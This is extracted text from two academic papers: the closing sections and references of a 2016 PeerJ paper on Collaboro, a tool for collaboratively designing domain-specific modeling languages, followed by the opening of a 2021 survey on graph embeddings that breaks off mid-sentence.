Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 24/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ The website also includes a left menu bar which allows the user to navigate through the different versions of the DSML as well as indicate some information about the recommender system status. Additionally, the user can quickly see the number of issues detected by the recommender, configure the metrics (see Fig. 14) that have to be executed and perform the metric execution to incorporate the change proposals into the collaboration. Figure 14 Snapshot of a subset of supported metrics. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 25/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ APPLICATION SCENARIOS In this section, we report the use of Collaboro in two types of scenarios: (1) the creation of new DSMLs, based on two different case studies; and (2) the extension of existing DSMLs, where we describe our experience in one case study. We also mention some lessons learned in the process. Developing new DSMLs We used Collaboro in the creation of two new DSMLs: (1) a textual DSML to define workflows and (2) three metamodels to represent code hosting platforms in the context of a modernization process. We explain each case in the following. Creating a textual DSML Collaboro was used in the development of a new DSML for MoDisco (http://eclipse.org/ modisco), an Eclipse project aimed at defining a group of tools for Model-Driven Reverse Engineering (MDRE) processes. The goal of this new DSML is to facilitate the development of MDRE workflows that chain several atomic reverse engineering tasks to extract the model/s of a running system. At the moment, the only way to define a MDRE workflow is by using an interactive wizard. MoDisco users have been asking for a specific language to do the same in a more direct way, i.e., without having to go through the wizard. Some years ago an initial attempt to create such language was finally abandoned but, to simplify the case study, we reused the metamodel that was proposed at the time to kickstart the process. Five researchers of the team followed our collaborative process to complete/improve the abstract syntax of the DSML and create from scratch a concrete syntax for it. Two of the members were part of the MoDisco development team so they took the role of developers in the process while the other three were only users of MoDisco so they adopted the role of end-users in the process. One of the members was in a different country during the collaboration so only asynchronous communication was possible. The collaboration took two weeks and resulted in two new versions of the MDRE workflow language released. The first version was mainly focused on the polishment of the abstract syntax whereas the second one paid more attention to the concrete syntax (this was not enforced by us but it came out naturally). The collaboration regarding the abstract syntax involved changes in concepts and reference cardinalities, while regarding the concrete syntax, the community chose to go for a textual-based notation and mainly discussed around the best keywords or style to be used for that. Defining metamodels We have also applied Collaboro for defining a set of metamodels used in a model-driven re-engineering process (i.e., only the abstract syntax of the DSML was part of the experiment since the models were to be automatically created during the reverse engineering process). In particular, the process was intended to provide support for migrating Google Code to GitHub projects, thus requiring the corresponding Platform- Specific Models (PSM) metamodels for both platforms, plus a Platform-Independent Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 26/35 http://eclipse.org/modisco http://eclipse.org/modisco http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Models (PIM) metamodel to represent such projects at high level of abstraction (following the typical terminology defined by the Model-Driven Architecture (MDA) approach from the OMG (Object Management Group, 2014a)). As the developers were distributed across different geographical locations, we decided to use Collaboro to create the PSM and PIM metamodels required. Six researchers geographically dispersed (i.e., the participants were part of three research groups, making three groups composed of 3, 2 and 1 researchers) collaborated in the definition of the metamodels. To kickstart the collaboration, one of the teams created a first version of each metamodel. As the collaboration was focused on defining only the abstract syntax of the language, there was no need for creating a notation model, and therefore the set of examples were rendered following a class-like diagram style. The collaboration took three weeks and resulted in two versions for each one of the PSM metamodels and only one version for the PIM metamodel since there the agreement was faster. Extending an existing DSML More recently, we were contacted by a community member of the Architecture Analysis & Design Language (AADL) (http://www.aadl.info), and one of the lead developers in charge of defining an extension to such language. AADL is an architecture description language used in the embedded and real-time systems field. It is a textual DSML with large abstract and concrete syntaxes. The abstract syntax contains more than 270 concepts and the concrete syntax is composed of more that 153 elements (including keywords and tokens). The language was being extended to incorporate support for behavior specification. This extension, called AADL Behavior Annex (AADL-BA) (http://penelope. enst.fr/aadl/wiki/Projects#AADL-BA-FrontEn), was being defined as a plugin enriching both the abstract and concrete syntaxes. At the time, the definition of the extension was taken care by a standarization committee open to new contributions. Change proposals were informally managed by in- person voting (i.e., raising hands in a meeting) or online ballots. Later, the documentation of the change proposal was spread out in a document, presentation or online wiki documentation. As explained to us by this lead developer, this process made tracking modifications very hard in the language as well as the corresponding argumentations, and he proposed to use Collaboro to manage the development of the extension for AADL. As a first step, we created a fake AADL project so that this person could play around with the tool and assess its usefulness for the AADL community. The feedback was that the tool would be very useful for the project at hand if we were able to deal with some technical challenges linked to the current setting used by the project so far. In particular, to be able to use Collaboro for managing the ADDL-BA language definition process we needed to import: (1) previous discussions stored in the wiki-based platform and (2) the current concrete syntaxes of the AADL and AADL-BA language defined in Xtext and ANTLR respectively (the abstract syntax was already defined as an EMF model so it could be directly imported into Collaboro). It was also clear that to simplify the use of the tool, we had to provide a web interface since it would be too complex for the members of Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 27/35 http://www.aadl.info http://penelope.enst.fr/aadl/wiki/Projects#AADL-BA-FrontEn http://penelope.enst.fr/aadl/wiki/Projects#AADL-BA-FrontEn http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ the AADL community to install an Eclipse environment just for the purpose of discussing around language issues. In the end, time constraints prevented us to test the tool with AADL community at large (the AADL-BA committee meets at fixed dates and we did create a web-based interface but could not get a new version of the tool with all the scripts required to import the legacy data on time), but the private iterations with the AADL-BA developer and his validation and positive feedback helped us a lot to improve Collaboro and learn more about the challenges of using Collaboro as a part of an ongoing language development effort. We are still in contact with this community and we will see if we can complete the test in the future or reach out other similar standardization committees. Lessons learned The development of the previous case studies provided us with some useful insights on the Collaboro process that since then have been integrated in our approach. For instance, in the first and second case studies, it turned out that conflicting proposals were frequent and therefore we added a conflicting relationship information explicitly in the collaboration metamodel so that once one of them was accepted we could automatically shut down the related ones. We also noted an intensive use of comments (easier to add) in comparison with proposals and solutions. This fact together with the discussions on what should constitute a new version and when to end the discussions (e.g., what if there was unanimity but not everybody had voted, should we wait for that person? for how long?) helped us to realize the importance of an explicit community manager role in charge of making sure the collaboration is always fluid and there are no bottlenecks or deadlocks. During the development of the three case studies, concurrent access to the models turned out to be a must as well since most of the time collaborations overlapped at some point. The experience gathered during the development of the first case study, where the collaboration was performed only in the Eclipse-based plugin, and later the requirements of the second and third case studies allowed us to provide a second front-end for the approach based on a web-client. Thus, the web-enabled support was crucial to allow all the developers to contribute and visualize how the metamodels evolved during the collaboration. In all the case studies the notation view allowed the participants to quickly validate the concrete syntax. This is specially important since for non-technical users it is easier to discuss at the concrete syntax level than at the abstract level. The only common complaint we got was regarding the limited support for voting (mainly raised in the first case study but also raised in the others), where participants reported that they would have preferred more options instead of just a boolean yes/no option. Note that this would have a non negligible impact on the decision algorithms that would need to be adapted to consider the new voting options. We plan to incorporate extra support to define how to make decisions, in a similar way as proposed in Cánovas Izquierdo & Cabot (2015). Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 28/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ RELATED WORK End-user involvement is a core feature of several software development methods (such as agile-based ones). The concept of community-driven development of a software product was introduced by Hess, Offenberg & Pipek (2008) and other authors have studied this collaboration as part of the requirement elicitation (Mylopoulos, Chung & Yu, 1999), ontology development (Leenheer, 2009; Siorpaes, 2007) and modeling phases of the software (Hildenbrand et al., 2008; Lanubile et al., 2010; Whitehead, 2007; Rittgen, 2008), but neither of them focuses on the DSML language design process nor they present the collaboration as a process of discussion, voting and argumentation from the beginning to the end of the language development process. End-user participation is also the core of user-centered design (Norman & Draper, 1986), initially focused on the design of user interfaces but lately applied to other domains (e.g., agile methodologies (Hussain, Slany & Holzinger, 2009) or web development (Troyer & Leune, 1998)). Again, none of these approaches can be directly applied to the specification of a DSML. Nevertheless, ideas from these papers have indeed influenced the Collaboro process. Regarding specific approaches around collaboration in DSML development, some works propose to derive a first DSML definition by means of user demonstrations (Cho, Gray & Syriani, 2012; Kuhrmann, 2011; Sánchez Cuadrado, de Lara & Guerra, 2012; López-Fernández et al., 2013) or grammar inference techniques (Javed et al., 2008; Liu et al., 2012), where example models are analyzed to derive the metamodel of the language. However, these approaches do not include any discussion phase nor validation of the generated metamodel with the end-users. In this sense, our approaches could complement each other, theirs could be used to create an initial metamodel from which to trigger the refinement process based on the discussions among the different users (Cánovas Izquierdo et al., 2013). Subsets of our proposal can also be linked to: i) specific tools for model versioning (e.g., AMOR repository (http://www.modelversioning.org) and Altmanninger, Seidl & Wimmer (2009)) that have already proposed a taxonomy of metamodel changes, ii) online-collaboration (Brosch et al., 2009; Gallardo, Bravo & Redondo, 2012) promoting synchronous collaboration among developers, iii) metamodel-centric language definition approaches (Scheidgen, 2008; Prinz, Scheidgen & Tveit, 2007) where the concrete syntax is considered at the same level as the abstract one and iv) collaboration protocols (Gallardo et al., 2013). In all cases, Collaboro extends the contributions of those tools with explicit collaboration and justification constructs, and provides as well the possibility of offline collaborations and a more formal representation of the interactions (e.g., voting system, explicit argumentation and rationale, traceability). The agreed DSML definition at the end of the Collaboro process could be then the input of the complete DSML modeling environment aimed by some of the tools mentioned above. Regarding the recommender engine and the calculation of metrics for DSMLs, we can identify works centered on assessing the quality of both the abstract and concrete syntaxes, and the main features of the language (e.g., reusability, integrability or compatibility). There are several works providing metrics to check the quality in Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 29/35 http://www.modelversioning.org http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ metamodels (Cho & Gray, 2011; Aguilera, Gómez & Olivé, 2012) and in the notation used for textual DSMLs (Power & Malloy, 2004; Črepinšek et al., 2010). With regard to graphical DSMLs, Moody’s principles (Moody, 2009) have emerged as the predominant theoretical paradigm. Originally based on the cognitive dimensions framework (Blackwell et al., 2001; Green, 1989; Green & Petre, 1996), Moody’s principles address their theoretical and practical limitations. While these principles provide a framework to evaluate visual notations, other works have put them into practice by analyzing DSMLs (Genon, Amyot & Heymans, 2011a; Genon, Heymans & Amyot, 2011b; Moody & van Hillegersberg, 2009; Le Pallec & Dupuy-Chessa, 2013) or complement the use of Moody’s principles with polls (Figl et al., 2010) also, thus allowing end-user feedback and involvement during the design process of a visual notation. However, the previous works are usually centered to specific DSMLs and do not provide mechanisms to be calculated to any DSML as our approach addresses. Other works such as (Kahraman & Bilgen, 2013) propose an evaluation framework focused on language features and therefore not particularly analyzing the quality from an end-user perspective. To the best of our knowledge, ours is the first proposal to generically assess the cognitive quality of DSMLs under development. Finally, the representation of the collaboration rationale is related to the area of requirements negotiation, argumentation and justification approaches such as the work presented by Jureta, Faulkner & Schobbens (2008). The decision algorithms proposed in those works could be integrated in our decision engine. Other decision engines such as CASLO (Padrón, Dodero & Lanchas, 2005) or HERMES (Karacapilidis & Papadias, 2001) could also be used. CONCLUSIONS We have presented Collaboro, a DSML to enable the participation of all members of a community in the specification of a new domain-specific language or in the creation of new models. Collaboro allows representing (and tracking) language change proposals, solutions and comments for both the abstract and concrete syntaxes of the language. This information can then be used to justify the design decisions taken during the definition or use of the modeling language. The approach provides two front-ends (i.e., Eclipse-based and web-based ones) to facilitate its usage and also incorporates a recommender system which checks the quality of the DSML under development. Once the community reaches an agreement on the language features, our Collaboro model could be later used as input to language workbenches in order to automatically create the DSL tooling (i.e., editors, parsers, palettes, repositories, etc.) needed to start using the language in practice. For instance, it would be possible to automatically create the configuration files required for XText (for textual languages) or GMF (for graphical ones) from our notation and abstract syntax models. As further work, we plan to extend our notation metamodel (and the renderer) to support richer concrete syntax definitions (e.g., incorporating the concept of anchor to specify how to represent the source/target connections for links in graphical languages). Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 30/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ These extensions should be defined as pluggable extensions to allow designers import them in the definition of languages where it is foreseen those additional concepts may be needed. We also find interesting to use our recommender system on existing (popular) languages as a way to assess the “quality” of such languages and, potentially, suggest changes to improve them. Furthermore, we would like to explore how to support the collaborative definition of the well-formed rules (e.g., OCL constraints) for the DSML under development. As these rules are normally expressed by using a (semi)formal textual language (like OCL), the challenge is how to discuss them in a way that non-technical experts can understand and participate. Finally, we are also exploring how to better encourage end-user participation (e.g., by applying gamification techniques) to make sure the process is as plural as possible. This could be tried as part of a new experiment in an educational setting at our institution (Universitat Oberta de Catalunya (UOC): www.uoc. edu) with the (virtual) students in our software engineering master degree. ADDITIONAL INFORMATION AND DECLARATIONS Funding Javier Luis Cánovas Izquierdo benefited from two postdoctoral fellowships grants by Inria and IN3-UOC during the realization of this work. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Inria and IN3-UOC. Competing Interests The authors declare that they have no competing interests. Author Contributions � Javier Luis Cánovas Izquierdo conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � Jordi Cabot conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Deposition The following information was supplied regarding data availability: GitHub: https://github.com/SOM-Research/collaboro. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 31/35 http://www.uoc.edu http://www.uoc.edu https://github.com/SOM-Research/collaboro http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ REFERENCES Aguilera D, Gómez C, Olivé A. 2012. A method for the definition and treatment of conceptual schema quality issues. In: International Conference on Conceptual Modeling. Vol. 7632. Berlin, Heidelberg: Springer, 501–514. Altmanninger K, Seidl M, Wimmer M. 2009. A survey on model versioning approaches. International Journal of Web Information Systems 5(3):271–304 DOI 10.1108/17440080910983556. Bariši�c A, Amaral V, Goulão M, Barroca B. 2012. Evaluating the usability of domain-specific languages. In: Formal and Practical Aspects of Domain-Specific Languages: Recent Developments, 386–407. Available at http://www.igi-global.com/chapter/evaluating-usability-domain-specific- languages/77793. Blackwell AF, Britton C, Cox AL, Green TRG, Gurr CA, Kadoda GF, Kutar M, Loomes M, Nehaniv CL, Petre M, Roast C, Roe C, Wong A, Young RM. 2001. Cognitive dimensions of notations: design tools for cognitive technology. In: International Conference on Cognitive Technology, Coventry, 325–341. Brosch P, Seidl M, Wieland K, Wimmer M, Langer P. 2009. We can work it out: collaborative conflict resolution in model versioning. In: European Conference on Computer Supported Cooperative Work. London: Springer, 207–214. Cabot J, Wilson G. 2009. Tools for teams: a survey of web-based software project portals. Available at http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/220301068. Cánovas Izquierdo JL, Cabot J. 2013. Enabling the collaborative definition of DSMLs. In: International Conference on Advanced Information Systems Engineering, Valencia, 272–287. Cánovas Izquierdo JL, Cabot J. 2015. Enabling the definition and enforcement of governance rules in open source systems. In: International Conference on Software Engineering. Piscataway: IEEE Press, 505–514. Cánovas Izquierdo JL, Cabot J, López-Fernández JJ, Sánchez Cuadrado J, Guerra E, de Lara J. 2013. Engaging end-users in the collaborative development of domain-specific modelling languages. In: International Conference on Cooperative Design, Visualization, and Engineering, Alcudia, Mallorca, 101–110. Cho H, Gray J. 2011. Design patterns for metamodels. In: Conference on Systems, Programming, and Applications: Software for Humanity–Colocated Workshop. New York: ACM, 25–32. Cho H, Gray J, Syriani E. 2012. Creating visual domain-specific modeling languages from end-user demonstration. In: International Workshop on Modeling in Software Engineering. Piscataway: IEEE Press, 29–35. Črepinšek M, Kosar T, Mernik M, Cervelle J, Forax R, Rousse G. 2010. On automata and language based grammar metrics. Computer Science and Information Systems 7(2):309–329 DOI 10.2298/CSIS1002309C. Dullemond K, van Gameren B, van Solingen R. 2014. Collaboration spaces for virtual software teams. IEEE Software 31(6):47–53 DOI 10.1109/MS.2014.105. Figl K, Derntl M, Rodrı́guez MC, Botturi L. 2010. Cognitive effectiveness of visual instructional design languages. Journal of Visual Languages & Computing 21(6):359–373 DOI 10.1016/j.jvlc.2010.08.009. Gabriel P, Goulão M, Amaral V. 2010. Do software languages engineers evaluate their languages? Congreso Iberoamericano en Software Engineering, Cuenca, 149–162. Gallardo J, Bravo C, Redondo MA. 2012. A model-driven development method for collaborative modeling tools. Journal of Network and Computer Applications 35(3):1086–1105 DOI 10.1016/j.jnca.2011.12.009. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 32/35 http://dx.doi.org/10.1108/17440080910983556 http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/77793 http://www.igi-global.com/chapter/evaluating-usability-domain-specific-languages/77793 http://www.drdobbs.com/tools/tools-for-teams-a-survey-of-web-based-so/220301068 http://dx.doi.org/10.2298/CSIS1002309C http://dx.doi.org/10.1109/MS.2014.105 http://dx.doi.org/10.1016/j.jvlc.2010.08.009 http://dx.doi.org/10.1016/j.jnca.2011.12.009 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Gallardo J, Bravo C, Redondo MA, de Lara J. 2013. Modeling collaboration protocols for collaborative modeling tools: experiences and applications. Journal of Visual Languages & Computing 24(1):10–23 DOI 10.1016/j.jvlc.2012.10.006. Genon N, Amyot D, Heymans P. 2011a. Analysing the cognitive effectiveness of the UCM visual notation. In: International Workshop on System Analysis and Modeling, Oslo, 221–240. Genon N, Heymans P, Amyot D. 2011b. Analysing the cognitive effectiveness of the BPMN 2.0 visual notation. In: International Conference on Software Language Engineering, Eindhoven, 377–396. Green TRG. 1989. Cognitive dimensions of notations. In: Sutcliffe A, Macaulay L, eds. People and Computers. Vol. 5. Cambridge: Cambridge University Press, 443–460. Green TRG, Petre M. 1996. Usability analysis of visual programming environments: a cognitive dimensions framework. Journal of Visual Languages & Computing 7(2):131–174 DOI 10.1006/jvlc.1996.0009. Grundy JC, Hosking J, Li KN, Ali NM, Huh J, Li RL. 2013. Generating domain-specific visual language tools from abstract visual specifications. IEEE Transactions on Software Engineering 39(4):487–515 DOI 10.1109/TSE.2012.33. Hatton L, van Genuchten M. 2012. Early design decisions. IEEE Software 29(1):87–89 DOI 10.1109/MS.2012.5. Hess J, Offenberg S, Pipek V. 2008. Community driven development as participation? Involving user communities in a software design process. In: Conference on Participatory Design. Indianapolis: Indiana University, 31–40. Hildenbrand T, Rothlauf F, Geisser M, Heinzl A, Kude T. 2008. Approaches to collaborative software development. In: Conference on Complex, Intelligent and Software Intensive Systems. Piscataway: IEEE, 523–528. Hussain Z, Slany W, Holzinger A. 2009. Current state of agile user-centered design: a survey. In: Symposium of the workgroup human-computer interaction and usability engineering of the austrian computer society–HCI and usability for e-Inclusion, Linz. Vol. 5889. 416–427. Javed F, Mernik M, Gray J, Bryant BR. 2008. MARS: a metamodel recovery system using grammar inference. Information and Software Technology 50(9–10):948–968 DOI 10.1016/j.infsof.2007.08.003. Jureta IJ, Faulkner S, Schobbens P-Y. 2008. Clear justification of modeling decisions for goal-oriented requirements engineering. Requirements Engineering 13(2):87–115 DOI 10.1007/s00766-007-0056-y. Kahraman G, Bilgen S. 2013. A framework for qualitative assessment of domain-specific languages. Software & System Modeling 14(4):1–22 DOI 10.1007/s10270-013-0387-8. Karacapilidis NI, Papadias D. 2001. Computer supported argumentation and collaborative decision making: the HERMES system. Information Systems 26(4):259–277 DOI 10.1016/S0306-4379(01)00020-5. Kelly S, Pohjonen R. 2009. Worst practices for domain-specific modeling. IEEE Software 26(4):22–29 DOI 10.1109/MS.2009.109. Kleppe A. 2008. Software language engineering: Creating domain-specific languages using metamodels. Boston: Addison Wesley. Kuhrmann M. 2011. User assistance during domain-specific language design. In: FlexiTools Workshop, Waikiki, Honolulu. Lanubile F, Ebert C, Prikladnicki R, Vizcaı́no A. 2010. Collaboration tools for global software engineering. IEEE Software 27(2):52–55 DOI 10.1109/MS.2010.39. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 33/35 http://dx.doi.org/10.1016/j.jvlc.2012.10.006 http://dx.doi.org/10.1006/jvlc.1996.0009 http://dx.doi.org/10.1109/TSE.2012.33 http://dx.doi.org/10.1109/MS.2012.5 http://dx.doi.org/10.1016/j.infsof.2007.08.003 http://dx.doi.org/10.1007/s00766-007-0056-y http://dx.doi.org/10.1007/s10270-013-0387-8 http://dx.doi.org/10.1016/S0306-4379(01)00020-5 http://dx.doi.org/10.1109/MS.2009.109 http://dx.doi.org/10.1109/MS.2010.39 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Le Pallec X, Dupuy-Chessa S. 2013. Support for quality metrics in metamodelling. In: Workshop on Graphical Modeling Language Development. New York: ACM, 23–31. Leenheer PD. 2009. On community-based ontology evolution. PhD thesis, Belgium: Vrije Universiteit Brussel. Available at https://d2so1lpcz9yn41.cloudfront.net/sites/vub/files/ 20090519a.pdf. Liu Q, Gray J, Mernik M, Bryant BR. 2012. Application of metamodel inference with large-scale metamodels. International Journal of Software and Informatics 6(2):201–231. López-Fernández JJ, Sánchez Cuadrado J, Guerra E, de Lara J. 2013. Example-driven meta-model development. Software & Systems Modeling 14(4):1323–1347 DOI 10.1007/s10270-013-0392-y. Mernik M, Heering J, Sloane AM. 2005. When and how to develop domain-specific languages. ACM Computing Surveys 37(4):316–344 DOI 10.1145/1118890. Miller GA. 1956. The magical number seven, plus or minus two: some limits on our capacity for processing information. Psychological Review 63(2):81–87 DOI 10.1037/h0043158. Moody DL. 2009. The physics of notations: toward a scientific basis for constructing visual notations in software engineering. IEEE Transactions on Software Engineering 35(6):756–779 DOI 10.1109/TSE.2009.67. Moody DL, van Hillegersberg J. 2009. Evaluating the visual syntax of UML: an analysis of the cognitive effectiveness of the UML family of diagrams. In: Conference on Software Language Engineering, Toulouse, 16–34. Mylopoulos J, Chung L, Yu ESK. 1999. From object-oriented to goal-oriented requirements analysis. Communications of the ACM 42(1):31–37 DOI 10.1145/291469.293165. Norman DA, Draper SW. 1986. User Centered System Design: New Perspectives on Human- Computer Interaction. Hillsdale: L. Erlbaum Associates Inc. Object Management Group (OMG). 2014a. Model-Driven Architecture (MDA) specification. Available at http://www.omg.org/mda/specs.htm (accessed 6 May 2016). Object Management Group (OMG). 2014b. Object Constraint Language (OCL) specification. Version 2.4. Available at http://www.omg.org/spec/OCL (accessed 6 May 2016). Object Management Group (OMG). 2015a. Diagram Definition (DD) specification. Version 1.1. Available at http://www.omg.org/spec/DD (accessed 6 May 2016). Object Management Group (OMG). 2015b. Meta Object Facility Core (MOF) specification. Version 2.5. Available at http://www.omg.org/spec/MOF/2.5 (accessed 6 May 2016). Padrón CL, Dodero JM, Lanchas J. 2005. CASLO: collaborative annotation service for learning objects. Learning Technology Newsletter 7(2):2–6. Power JF, Malloy BA. 2004. A metrics suite for grammar-based software. Journal of Software Maintenance and Evolution: Research and Practice 16(6):405–426 DOI 10.1002/smr.293. Prinz A, Scheidgen M, Tveit MS. 2007. A model-based standard for SDL. In: International SDL Forum, Paris, 1–18. Rittgen P. 2008. COMA: a tool for collaborative modeling. In: Forum at the International Conference on Advanced Information Systems Engineering, Montpellier, 61–64. Rooksby J, Ikeya N. 2012. Collaboration in formative design: working together. IEEE Software 29(1):56–60 DOI 10.1109/MS.2011.123. Sánchez Cuadrado J, de Lara J, Guerra E. 2012. Bottom-up meta-modelling: an interactive approach. In: Conference on Model Driven Engineering Languages and Systems, Innsbruck, 1–17. Sánchez Cuadrado J, Garcı́a Molina J. 2007. Building domain-specific languages for model-driven development. IEEE software 24(5):48–55. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 34/35 https://d2so1lpcz9yn41.cloudfront.net/sites/vub/files/20090519a.pdf https://d2so1lpcz9yn41.cloudfront.net/sites/vub/files/20090519a.pdf http://dx.doi.org/10.1007/s10270-013-0392-y http://dx.doi.org/10.1145/1118890 http://dx.doi.org/10.1037/h0043158 http://dx.doi.org/10.1109/TSE.2009.67 http://dx.doi.org/10.1145/291469.293165 http://www.omg.org/mda/specs.htm http://www.omg.org/spec/OCL http://www.omg.org/spec/DD http://www.omg.org/spec/MOF/2.5 http://dx.doi.org/10.1002/smr.293 http://dx.doi.org/10.1109/MS.2011.123 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Scheidgen M. 2008. Textual modelling embedded into graphical modelling. In: European Conference on Model Driven Architecture–Foundations and Applications, Berlin. Vol. 5095, 153–168. Siorpaes K. 2007. Lightweight community-driven ontology evolution. In: International Semantic Web Conference, Busan. Vol. 4, 951–955. Steinberg D, Budinsky F, Paternostro M, Merks E. 2008. EMF: Eclipse Modeling Framework. Boston: Addison Wesley. SVG. 2011. Scalable vector graphics 1.1. Available at http://www.w3.org/TR/SVG/. Tamburri Da, Lago P, Vliet HV. 2013. Organizational social structures for software engineering. ACM Computing Surveys 46(1):1–35 DOI 10.1145/2522968.2522971. Troyer OD, Leune CJ. 1998. WSDM: a user centered design method for web sites. Computer Networks 30(1–7):85–94. Völter M. 2011. MD�/DSL best practices. Available at http://voelter.de/data/pub/DSLBestPractices- 2011Update.pdf (accessed 6 May 2016). Whitehead J. 2007. Collaboration in software engineering: a roadmap. In: Workshop on the Future of Software Engineering. Piscataway: IEEE Computer Society, 214–225. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 35/35 http://www.w3.org/TR/SVG/ http://dx.doi.org/10.1145/2522968.2522971 http://voelter.de/data/pub/DSLBestPractices-2011Update.pdf http://voelter.de/data/pub/DSLBestPractices-2011Update.pdf https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.84 Collaboro: a collaborative (meta) modeling tool Introduction Collaborative (meta) Modeling Making DSML Development Collaborative Collaborative Modeling Tool Support Application Scenarios Related Work Conclusions References work_kcfnc6khsraxhcor4ocz3g7ixm ---- Survey on graph embeddings and their applications to machine learning problems on graphs Survey on graph embeddings and their applications to machine learning problems on graphs Ilya Makarov1,2, Dmitrii Kiselev1, Nikita Nikitinsky3 and Lovro Subelj2 1 HSE University, Moscow, Russia 2 Faculty of Computer and Information Science, University of Ljubljana, Ljubljana, Slovenia 3 Big Data Research Center, National University of Science and Technology MISIS, Moscow, Russia ABSTRACT Dealing with relational data always required significant computational resources, domain expertise and task-dependent feature engineering to incorporate structural information into a predictive model. Nowadays, a family of automated graph feature engineering techniques has been proposed in different streams of literature. So-called graph embeddings provide a powerful tool to construct vectorized feature spaces for graphs and their components, such as nodes, edges and subgraphs under preserving inner graph properties. Using the constructed feature spaces, many machine learning problems on graphs can be solved via standard frameworks suitable for vectorized feature representation. Our survey aims to describe the core concepts of graph embeddings and provide several taxonomies for their description. First, we start with the methodological approach and extract three types of graph embedding models based on matrix factorization, random-walks and deep learning approaches. Next, we describe how different types of networks impact the ability of models to incorporate structural and attributed data into a unified embedding. Going further, we perform a thorough evaluation of graph embedding applications to machine learning problems on graphs, among which are node classification, link prediction, clustering, visualization, compression, and a family of the whole graph embedding algorithms suitable for graph classification, similarity and alignment problems. Finally, we overview the existing applications of graph embeddings to computer science domains, formulate open problems and provide experiment results, explaining how different networks properties result in graph embeddings quality in the four classic machine learning problems on graphs, such as node classification, link prediction, clustering and graph visualization. As a result, our survey covers a new rapidly growing field of network feature engineering, presents an in-depth analysis of models based on network types, and overviews a wide range of applications to machine learning problems on graphs. Subjects Artificial Intelligence, Data Mining and Machine Learning, Network Science and Online Social Networks, Theory and Formal Methods, World Wide Web and Web Science Keywords Graph embedding, Knowledge representation, Machine learning, Network science, Geometric deep learning, Graph neural networks, Node classification, Link prediction, Node clustering, Graph visualization How to cite this article Makarov I, Kiselev D, Nikitinsky N, Subelj L. 2021. Survey on graph embeddings and their applications to machine learning problems on graphs. PeerJ Comput. Sci. 7:e357 DOI 10.7717/peerj-cs.357 Submitted 21 July 2020 Accepted 18 December 2020 Published 4 February 2021 Corresponding authors Ilya Makarov, iamakarov@hse.ru Dmitrii Kiselev, dkiseljov@hse.ru Academic editor Xiangjie Kong Additional Information and Declarations can be found on page 39 DOI 10.7717/peerj-cs.357 Copyright 2021 Makarov et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.357 mailto:iamakarov@�hse.�ru mailto:dkiseljov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.357 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ INTRODUCTION Many instances in the real world can be modeled as graphs or networks. Some of the typical examples include social interactions, biological data, such as protein interactions or neural connections, links between websites on the Internet, etc. One of the main goals of graph modeling is to formulate a general technique capable of processing structural data including relations between objects, which may also have some domain-specific information. For example, given a social network, we might be interested in predicting whether a pair of users are friends, or in identifying communities of interconnected users. The former leads to a link prediction problem on the graph, while the latter describes a node clustering problem. We focus on graph representation theory, aiming to automatically learn low- dimensional vector features for the simplest graph motifs, such as nodes and edges, in a way that would enable efficiently solve machine learning problems on graphs including node classification, link prediction, node clustering, while also tackling approaches for graph similarity and classification, and general aspects of graph visualization. Before the emergence of the area, the extraction of important features for predictive tasks on graphs had to be manually engineered. It required a lot of efforts from the domain experts. For example, many approaches for graph representation rely on extracting summary statistics, such as vertex degrees or clustering coefficients (Bhagat, Cormode & Muthukrishnan, 2011) popular in social sciences, graph kernels (Vishwanathan et al., 2010) particularly used in computational biology to compute inner product similarities between graphs, or specifically designed features to measure neighborhood similarity (Liben-Nowell & Kleinberg, 2007). In addition to the time-consuming feature engineering, such summaries were very inflexible, task/data-dependent, and did not generalize well across different prediction tasks on graphs. An alternative methodology is to learn feature representations automatically as an optimization problem. The goal is to design objective cost functions that capture dependencies and similarities in a graph while preserving high quality in relational machine learning tasks and constructing 